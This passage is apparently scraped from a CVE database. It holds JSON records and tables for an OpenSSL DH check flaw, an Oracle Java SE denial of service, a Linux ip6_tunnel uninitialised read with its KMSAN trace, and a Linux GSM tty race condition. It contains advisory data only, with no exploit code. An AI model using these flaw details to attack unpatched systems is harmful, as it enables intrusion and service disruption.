"https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8780a896543a654e757db1b9396383f9d8095528" }, { "name": "1.0.2zi patch (premium)", "tags": [ "patch" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9a0a4d3c1e7138915563c0df4fe6a3f9377b839c" } ], "source": { "discovery": "UNKNOWN" }, "title": "Excessive time spent checking DH keys and parameters", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "assignerShortName": "openssl", "cveId": "CVE-2023-3446", "datePublished": "2023-07-19T11:31:34.994Z", "dateReserved": "2023-06-28T14:21:39.968Z", "dateUpdated": "2024-10-14T14:55:47.238Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-21011
Vulnerability from cvelistv5
Published
2024-04-16 21:26
Modified
2024-11-21 20:07
Severity ?
EPSS score ?
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | Oracle Corporation | Java SE JDK and JRE |
Version: Oracle Java SE:8u401 Version: Oracle Java SE:8u401-perf Version: Oracle Java SE:11.0.22 Version: Oracle Java SE:17.0.10 Version: Oracle Java SE:21.0.2 Version: Oracle Java SE:22 Version: Oracle GraalVM for JDK:17.0.10 Version: Oracle GraalVM for JDK:21.0.2 Version: Oracle GraalVM for JDK:22 Version: Oracle GraalVM Enterprise Edition:20.3.13 Version: Oracle GraalVM Enterprise Edition:21.3.9 cpe:2.3:a:oracle:java_se:8u401:*:*:*:*:*:*:* cpe:2.3:a:oracle:java_se:8u401:*:*:*:enterprise_performance:*:*:* cpe:2.3:a:oracle:java_se:11.0.22:*:*:*:*:*:*:* cpe:2.3:a:oracle:java_se:17.0.10:*:*:*:*:*:*:* cpe:2.3:a:oracle:java_se:21.0.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:java_se:22:*:*:*:*:*:*:* cpe:2.3:a:oracle:graalvm_for_jdk:17.0.10:*:*:*:*:*:*:* cpe:2.3:a:oracle:graalvm_for_jdk:21.0.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:graalvm_for_jdk:22:*:*:*:*:*:*:* cpe:2.3:a:oracle:graalvm:20.3.13:*:*:*:enterprise:*:*:* cpe:2.3:a:oracle:graalvm:21.3.9:*:*:*:enterprise:*:*:* |
|
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2024-21011", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-07-26T15:16:14.279567Z", "version": "2.0.3" }, "type": "ssvc" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-770", "description": "CWE-770 Allocation of Resources Without Limits or Throttling", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-21T20:07:53.410Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-01T22:13:42.278Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "Oracle Advisory", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.oracle.com/security-alerts/cpuapr2024.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00014.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240426-0004/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "cpes": [ "cpe:2.3:a:oracle:java_se:8u401:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:java_se:8u401:*:*:*:enterprise_performance:*:*:*", "cpe:2.3:a:oracle:java_se:11.0.22:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:java_se:17.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:java_se:21.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:java_se:22:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:graalvm_for_jdk:17.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:graalvm_for_jdk:21.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:graalvm_for_jdk:22:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:graalvm:20.3.13:*:*:*:enterprise:*:*:*", "cpe:2.3:a:oracle:graalvm:21.3.9:*:*:*:enterprise:*:*:*" ], "product": "Java SE JDK and JRE", "vendor": "Oracle Corporation", "versions": [ { "status": "affected", "version": "Oracle Java SE:8u401" }, { "status": "affected", "version": "Oracle Java SE:8u401-perf" }, { "status": "affected", "version": "Oracle Java SE:11.0.22" }, { "status": "affected", "version": "Oracle Java SE:17.0.10" }, { "status": "affected", "version": "Oracle Java SE:21.0.2" }, { "status": "affected", "version": "Oracle Java SE:22" }, { "status": "affected", "version": "Oracle GraalVM for JDK:17.0.10" }, { "status": "affected", "version": "Oracle GraalVM for JDK:21.0.2" }, { "status": "affected", "version": "Oracle GraalVM for JDK:22" }, { "status": "affected", "version": "Oracle GraalVM Enterprise Edition:20.3.13" }, { "status": "affected", "version": "Oracle GraalVM Enterprise Edition:21.3.9" } ] } ], "descriptions": [ { "lang": "en-US", "value": "Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 8u401, 8u401-perf, 11.0.22, 17.0.10, 21.0.2, 22; Oracle GraalVM for JDK: 17.0.10, 21.0.2, 22; Oracle GraalVM Enterprise Edition: 20.3.13 and 21.3.9. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L)." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 3.7, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "description": "Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition.", "lang": "en-US" } ] } ], "providerMetadata": { "dateUpdated": "2024-04-16T21:26:01.896Z", "orgId": "43595867-4340-4103-b7a2-9a5208d29a85", "shortName": "oracle" }, "references": [ { "name": "Oracle Advisory", "tags": [ "vendor-advisory" ], "url": "https://www.oracle.com/security-alerts/cpuapr2024.html" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00014.html" }, { "url": "https://security.netapp.com/advisory/ntap-20240426-0004/" } ] } }, "cveMetadata": { "assignerOrgId": "43595867-4340-4103-b7a2-9a5208d29a85", "assignerShortName": "oracle", "cveId": "CVE-2024-21011", "datePublished": "2024-04-16T21:26:01.896Z", "dateReserved": "2023-12-07T22:28:10.648Z", "dateUpdated": "2024-11-21T20:07:53.410Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-26633
Vulnerability from cvelistv5
Published
2024-03-18 10:07
Modified
2024-12-20 13:06
Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ip6_tunnel: fix NEXTHDR_FRAGMENT handling in ip6_tnl_parse_tlv_enc_lim()
syzbot pointed out [1] that NEXTHDR_FRAGMENT handling is broken.
Reading frag_off can only be done if we pulled enough bytes
to skb->head. Currently we might access garbage.
[1]
BUG: KMSAN: uninit-value in ip6_tnl_parse_tlv_enc_lim+0x94f/0xbb0
ip6_tnl_parse_tlv_enc_lim+0x94f/0xbb0
ipxip6_tnl_xmit net/ipv6/ip6_tunnel.c:1326 [inline]
ip6_tnl_start_xmit+0xab2/0x1a70 net/ipv6/ip6_tunnel.c:1432
__netdev_start_xmit include/linux/netdevice.h:4940 [inline]
netdev_start_xmit include/linux/netdevice.h:4954 [inline]
xmit_one net/core/dev.c:3548 [inline]
dev_hard_start_xmit+0x247/0xa10 net/core/dev.c:3564
__dev_queue_xmit+0x33b8/0x5130 net/core/dev.c:4349
dev_queue_xmit include/linux/netdevice.h:3134 [inline]
neigh_connected_output+0x569/0x660 net/core/neighbour.c:1592
neigh_output include/net/neighbour.h:542 [inline]
ip6_finish_output2+0x23a9/0x2b30 net/ipv6/ip6_output.c:137
ip6_finish_output+0x855/0x12b0 net/ipv6/ip6_output.c:222
NF_HOOK_COND include/linux/netfilter.h:303 [inline]
ip6_output+0x323/0x610 net/ipv6/ip6_output.c:243
dst_output include/net/dst.h:451 [inline]
ip6_local_out+0xe9/0x140 net/ipv6/output_core.c:155
ip6_send_skb net/ipv6/ip6_output.c:1952 [inline]
ip6_push_pending_frames+0x1f9/0x560 net/ipv6/ip6_output.c:1972
rawv6_push_pending_frames+0xbe8/0xdf0 net/ipv6/raw.c:582
rawv6_sendmsg+0x2b66/0x2e70 net/ipv6/raw.c:920
inet_sendmsg+0x105/0x190 net/ipv4/af_inet.c:847
sock_sendmsg_nosec net/socket.c:730 [inline]
__sock_sendmsg net/socket.c:745 [inline]
____sys_sendmsg+0x9c2/0xd60 net/socket.c:2584
___sys_sendmsg+0x28d/0x3c0 net/socket.c:2638
__sys_sendmsg net/socket.c:2667 [inline]
__do_sys_sendmsg net/socket.c:2676 [inline]
__se_sys_sendmsg net/socket.c:2674 [inline]
__x64_sys_sendmsg+0x307/0x490 net/socket.c:2674
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0x44/0x110 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x63/0x6b
Uninit was created at:
slab_post_alloc_hook+0x129/0xa70 mm/slab.h:768
slab_alloc_node mm/slub.c:3478 [inline]
__kmem_cache_alloc_node+0x5c9/0x970 mm/slub.c:3517
__do_kmalloc_node mm/slab_common.c:1006 [inline]
__kmalloc_node_track_caller+0x118/0x3c0 mm/slab_common.c:1027
kmalloc_reserve+0x249/0x4a0 net/core/skbuff.c:582
pskb_expand_head+0x226/0x1a00 net/core/skbuff.c:2098
__pskb_pull_tail+0x13b/0x2310 net/core/skbuff.c:2655
pskb_may_pull_reason include/linux/skbuff.h:2673 [inline]
pskb_may_pull include/linux/skbuff.h:2681 [inline]
ip6_tnl_parse_tlv_enc_lim+0x901/0xbb0 net/ipv6/ip6_tunnel.c:408
ipxip6_tnl_xmit net/ipv6/ip6_tunnel.c:1326 [inline]
ip6_tnl_start_xmit+0xab2/0x1a70 net/ipv6/ip6_tunnel.c:1432
__netdev_start_xmit include/linux/netdevice.h:4940 [inline]
netdev_start_xmit include/linux/netdevice.h:4954 [inline]
xmit_one net/core/dev.c:3548 [inline]
dev_hard_start_xmit+0x247/0xa10 net/core/dev.c:3564
__dev_queue_xmit+0x33b8/0x5130 net/core/dev.c:4349
dev_queue_xmit include/linux/netdevice.h:3134 [inline]
neigh_connected_output+0x569/0x660 net/core/neighbour.c:1592
neigh_output include/net/neighbour.h:542 [inline]
ip6_finish_output2+0x23a9/0x2b30 net/ipv6/ip6_output.c:137
ip6_finish_output+0x855/0x12b0 net/ipv6/ip6_output.c:222
NF_HOOK_COND include/linux/netfilter.h:303 [inline]
ip6_output+0x323/0x610 net/ipv6/ip6_output.c:243
dst_output include/net/dst.h:451 [inline]
ip6_local_out+0xe9/0x140 net/ipv6/output_core.c:155
ip6_send_skb net/ipv6/ip6_output.c:1952 [inline]
ip6_push_pending_frames+0x1f9/0x560 net/ipv6/ip6_output.c:1972
rawv6_push_pending_frames+0xbe8/0xdf0 net/ipv6/raw.c:582
rawv6_sendmsg+0x2b66/0x2e70 net/ipv6/raw.c:920
inet_sendmsg+0x105/0x190 net/ipv4/af_inet.c:847
sock_sendmsg_nosec net/socket.c:730 [inline]
__sock_sendmsg net/socket.c:745 [inline]
____sys_sendmsg+0x9c2/0xd60 net/socket.c:2584
___sys_sendmsg+0x28d/0x3c0 net/socket.c:2638
__sys_sendmsg net/socket.c:2667 [inline]
__do_sys_sendms
---truncated---
References
Impacted products
Vendor | Product | Version | |||||
---|---|---|---|---|---|---|---|
▼ | Linux | Linux |
Version: fbfa743a9d2a0ffa24251764f10afc13eb21e739 Version: fbfa743a9d2a0ffa24251764f10afc13eb21e739 Version: fbfa743a9d2a0ffa24251764f10afc13eb21e739 Version: fbfa743a9d2a0ffa24251764f10afc13eb21e739 Version: fbfa743a9d2a0ffa24251764f10afc13eb21e739 Version: fbfa743a9d2a0ffa24251764f10afc13eb21e739 Version: fbfa743a9d2a0ffa24251764f10afc13eb21e739 Version: fbfa743a9d2a0ffa24251764f10afc13eb21e739 |
||||
|
{ "containers": { "adp": [ { "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" } }, { "other": { "content": { "id": "CVE-2024-26633", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-03-18T19:01:45.822242Z", "version": "2.0.3" }, "type": "ssvc" } } ], "problemTypes": [ { "descriptions": [ { "description": "CWE-noinfo Not enough information", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-05T17:13:27.539Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-12-20T13:06:42.426Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/135414f300c5db995e2a2f3bf0f455de9d014aee" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/3f15ba3dc14e6ee002ea01b4faddc3d49200377c" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/da23bd709b46168f7dfc36055801011222b076cd" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/4329426cf6b8e22b798db2331c7ef1dd2a9c748d" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/62a1fedeb14c7ac0947ef33fadbabd35ed2400a2" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/687c5d52fe53e602e76826dbd4d7af412747e183" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/ba8d904c274268b18ef3dc11d3ca7b24a96cb087" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/d375b98e0248980681e5e56b712026174d617198" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html" }, { "url": "https://security.netapp.com/advisory/ntap-20241220-0001/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "Linux", "programFiles": [ "net/ipv6/ip6_tunnel.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "lessThan": "135414f300c5db995e2a2f3bf0f455de9d014aee", "status": "affected", "version": "fbfa743a9d2a0ffa24251764f10afc13eb21e739", "versionType": "git" }, { "lessThan": "3f15ba3dc14e6ee002ea01b4faddc3d49200377c", "status": "affected", "version": "fbfa743a9d2a0ffa24251764f10afc13eb21e739", "versionType": "git" }, { "lessThan": "da23bd709b46168f7dfc36055801011222b076cd", "status": "affected", "version": "fbfa743a9d2a0ffa24251764f10afc13eb21e739", "versionType": "git" }, { "lessThan": "4329426cf6b8e22b798db2331c7ef1dd2a9c748d", "status": "affected", "version": "fbfa743a9d2a0ffa24251764f10afc13eb21e739", "versionType": "git" }, { "lessThan": "62a1fedeb14c7ac0947ef33fadbabd35ed2400a2", "status": "affected", "version": "fbfa743a9d2a0ffa24251764f10afc13eb21e739", "versionType": "git" }, { "lessThan": "687c5d52fe53e602e76826dbd4d7af412747e183", "status": "affected", "version": "fbfa743a9d2a0ffa24251764f10afc13eb21e739", "versionType": "git" }, { "lessThan": "ba8d904c274268b18ef3dc11d3ca7b24a96cb087", "status": "affected", "version": "fbfa743a9d2a0ffa24251764f10afc13eb21e739", "versionType": "git" }, { "lessThan": "d375b98e0248980681e5e56b712026174d617198", "status": "affected", "version": "fbfa743a9d2a0ffa24251764f10afc13eb21e739", "versionType": "git" } ] }, { "defaultStatus": "affected", "product": "Linux", "programFiles": [ "net/ipv6/ip6_tunnel.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "status": "affected", "version": "4.10" }, { "lessThan": "4.10", "status": "unaffected", "version": "0", "versionType": "semver" }, { "lessThanOrEqual": "4.19.*", "status": "unaffected", "version": "4.19.306", "versionType": "semver" }, { "lessThanOrEqual": "5.4.*", "status": "unaffected", "version": "5.4.268", "versionType": "semver" }, { "lessThanOrEqual": "5.10.*", "status": "unaffected", "version": "5.10.209", "versionType": "semver" }, { "lessThanOrEqual": "5.15.*", "status": "unaffected", "version": "5.15.148", "versionType": "semver" }, { "lessThanOrEqual": "6.1.*", "status": "unaffected", "version": "6.1.75", "versionType": "semver" }, { "lessThanOrEqual": "6.6.*", "status": "unaffected", "version": "6.6.14", "versionType": "semver" }, { "lessThanOrEqual": "6.7.*", "status": "unaffected", "version": "6.7.2", "versionType": "semver" }, { "lessThanOrEqual": "*", "status": "unaffected", "version": "6.8", "versionType": "original_commit_for_fix" } ] } ], "descriptions": [ { "lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nip6_tunnel: fix NEXTHDR_FRAGMENT handling in ip6_tnl_parse_tlv_enc_lim()\n\nsyzbot pointed out [1] that NEXTHDR_FRAGMENT handling is broken.\n\nReading frag_off can only be done if we pulled enough bytes\nto skb-\u003ehead. Currently we might access garbage.\n\n[1]\nBUG: KMSAN: uninit-value in ip6_tnl_parse_tlv_enc_lim+0x94f/0xbb0\nip6_tnl_parse_tlv_enc_lim+0x94f/0xbb0\nipxip6_tnl_xmit net/ipv6/ip6_tunnel.c:1326 [inline]\nip6_tnl_start_xmit+0xab2/0x1a70 net/ipv6/ip6_tunnel.c:1432\n__netdev_start_xmit include/linux/netdevice.h:4940 [inline]\nnetdev_start_xmit include/linux/netdevice.h:4954 [inline]\nxmit_one net/core/dev.c:3548 [inline]\ndev_hard_start_xmit+0x247/0xa10 net/core/dev.c:3564\n__dev_queue_xmit+0x33b8/0x5130 net/core/dev.c:4349\ndev_queue_xmit include/linux/netdevice.h:3134 [inline]\nneigh_connected_output+0x569/0x660 net/core/neighbour.c:1592\nneigh_output include/net/neighbour.h:542 [inline]\nip6_finish_output2+0x23a9/0x2b30 net/ipv6/ip6_output.c:137\nip6_finish_output+0x855/0x12b0 net/ipv6/ip6_output.c:222\nNF_HOOK_COND include/linux/netfilter.h:303 [inline]\nip6_output+0x323/0x610 net/ipv6/ip6_output.c:243\ndst_output include/net/dst.h:451 [inline]\nip6_local_out+0xe9/0x140 net/ipv6/output_core.c:155\nip6_send_skb net/ipv6/ip6_output.c:1952 [inline]\nip6_push_pending_frames+0x1f9/0x560 net/ipv6/ip6_output.c:1972\nrawv6_push_pending_frames+0xbe8/0xdf0 net/ipv6/raw.c:582\nrawv6_sendmsg+0x2b66/0x2e70 net/ipv6/raw.c:920\ninet_sendmsg+0x105/0x190 net/ipv4/af_inet.c:847\nsock_sendmsg_nosec net/socket.c:730 [inline]\n__sock_sendmsg net/socket.c:745 [inline]\n____sys_sendmsg+0x9c2/0xd60 net/socket.c:2584\n___sys_sendmsg+0x28d/0x3c0 net/socket.c:2638\n__sys_sendmsg net/socket.c:2667 [inline]\n__do_sys_sendmsg net/socket.c:2676 [inline]\n__se_sys_sendmsg net/socket.c:2674 [inline]\n__x64_sys_sendmsg+0x307/0x490 net/socket.c:2674\ndo_syscall_x64 arch/x86/entry/common.c:52 [inline]\ndo_syscall_64+0x44/0x110 arch/x86/entry/common.c:83\nentry_SYSCALL_64_after_hwframe+0x63/0x6b\n\nUninit was created at:\nslab_post_alloc_hook+0x129/0xa70 mm/slab.h:768\nslab_alloc_node mm/slub.c:3478 [inline]\n__kmem_cache_alloc_node+0x5c9/0x970 mm/slub.c:3517\n__do_kmalloc_node mm/slab_common.c:1006 [inline]\n__kmalloc_node_track_caller+0x118/0x3c0 mm/slab_common.c:1027\nkmalloc_reserve+0x249/0x4a0 net/core/skbuff.c:582\npskb_expand_head+0x226/0x1a00 net/core/skbuff.c:2098\n__pskb_pull_tail+0x13b/0x2310 net/core/skbuff.c:2655\npskb_may_pull_reason include/linux/skbuff.h:2673 [inline]\npskb_may_pull include/linux/skbuff.h:2681 [inline]\nip6_tnl_parse_tlv_enc_lim+0x901/0xbb0 net/ipv6/ip6_tunnel.c:408\nipxip6_tnl_xmit net/ipv6/ip6_tunnel.c:1326 [inline]\nip6_tnl_start_xmit+0xab2/0x1a70 net/ipv6/ip6_tunnel.c:1432\n__netdev_start_xmit include/linux/netdevice.h:4940 [inline]\nnetdev_start_xmit include/linux/netdevice.h:4954 [inline]\nxmit_one net/core/dev.c:3548 [inline]\ndev_hard_start_xmit+0x247/0xa10 net/core/dev.c:3564\n__dev_queue_xmit+0x33b8/0x5130 net/core/dev.c:4349\ndev_queue_xmit include/linux/netdevice.h:3134 [inline]\nneigh_connected_output+0x569/0x660 net/core/neighbour.c:1592\nneigh_output include/net/neighbour.h:542 [inline]\nip6_finish_output2+0x23a9/0x2b30 net/ipv6/ip6_output.c:137\nip6_finish_output+0x855/0x12b0 net/ipv6/ip6_output.c:222\nNF_HOOK_COND include/linux/netfilter.h:303 [inline]\nip6_output+0x323/0x610 net/ipv6/ip6_output.c:243\ndst_output include/net/dst.h:451 [inline]\nip6_local_out+0xe9/0x140 net/ipv6/output_core.c:155\nip6_send_skb net/ipv6/ip6_output.c:1952 [inline]\nip6_push_pending_frames+0x1f9/0x560 net/ipv6/ip6_output.c:1972\nrawv6_push_pending_frames+0xbe8/0xdf0 net/ipv6/raw.c:582\nrawv6_sendmsg+0x2b66/0x2e70 net/ipv6/raw.c:920\ninet_sendmsg+0x105/0x190 net/ipv4/af_inet.c:847\nsock_sendmsg_nosec net/socket.c:730 [inline]\n__sock_sendmsg net/socket.c:745 [inline]\n____sys_sendmsg+0x9c2/0xd60 net/socket.c:2584\n___sys_sendmsg+0x28d/0x3c0 net/socket.c:2638\n__sys_sendmsg net/socket.c:2667 [inline]\n__do_sys_sendms\n---truncated---" } ], "providerMetadata": { "dateUpdated": "2024-12-19T08:43:54.231Z", "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "shortName": "Linux" }, "references": [ { "url": "https://git.kernel.org/stable/c/135414f300c5db995e2a2f3bf0f455de9d014aee" }, { "url": "https://git.kernel.org/stable/c/3f15ba3dc14e6ee002ea01b4faddc3d49200377c" }, { "url": "https://git.kernel.org/stable/c/da23bd709b46168f7dfc36055801011222b076cd" }, { "url": "https://git.kernel.org/stable/c/4329426cf6b8e22b798db2331c7ef1dd2a9c748d" }, { "url": "https://git.kernel.org/stable/c/62a1fedeb14c7ac0947ef33fadbabd35ed2400a2" }, { "url": "https://git.kernel.org/stable/c/687c5d52fe53e602e76826dbd4d7af412747e183" }, { "url": "https://git.kernel.org/stable/c/ba8d904c274268b18ef3dc11d3ca7b24a96cb087" }, { "url": "https://git.kernel.org/stable/c/d375b98e0248980681e5e56b712026174d617198" } ], "title": "ip6_tunnel: fix NEXTHDR_FRAGMENT handling in ip6_tnl_parse_tlv_enc_lim()", "x_generator": { "engine": "bippy-5f407fcff5a0" } } }, "cveMetadata": { "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "assignerShortName": "Linux", "cveId": "CVE-2024-26633", "datePublished": "2024-03-18T10:07:49.468Z", "dateReserved": "2024-02-19T14:20:24.136Z", "dateUpdated": "2024-12-20T13:06:42.426Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-6546
Vulnerability from cvelistv5
Published
2023-12-21 20:01
Modified
2024-11-15 15:13
Severity ?
EPSS score ?
Summary
A race condition was found in the GSM 0710 tty multiplexor in the Linux kernel. This issue occurs when two threads execute the GSMIOC_SETCONF ioctl on the same tty file descriptor with the gsm line discipline enabled, and can lead to a use-after-free problem on a struct gsm_dlci while restarting the gsm mux. This could allow a local unprivileged user to escalate their privileges on the system.
References
Impacted products
Vendor | Product | Version | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ | Red Hat | Red Hat Enterprise Linux 8 |
Unaffected: 0:4.18.0-513.24.1.rt7.326.el8_9 < * cpe:/a:redhat:enterprise_linux:8::realtime cpe:/a:redhat:enterprise_linux:8::nfv |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T08:35:14.746Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/04/10/18" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/04/10/21" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/04/11/7" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/04/11/9" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/04/12/1" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/04/12/2" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/04/16/2" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/04/17/1" }, { "name": "RHSA-2024:0930", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0930" }, { "name": "RHSA-2024:0937", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0937" }, { "name": "RHSA-2024:1018", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1018" }, { "name": "RHSA-2024:1019", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1019" }, { "name": "RHSA-2024:1055", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1055" }, { "name": "RHSA-2024:1250", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1250" }, { "name": "RHSA-2024:1253", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1253" }, { "name": "RHSA-2024:1306", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1306" }, { "name": "RHSA-2024:1607", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1607" }, { "name": "RHSA-2024:1612", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1612" }, { "name": "RHSA-2024:1614", "tags": [ "vendor-advisory", 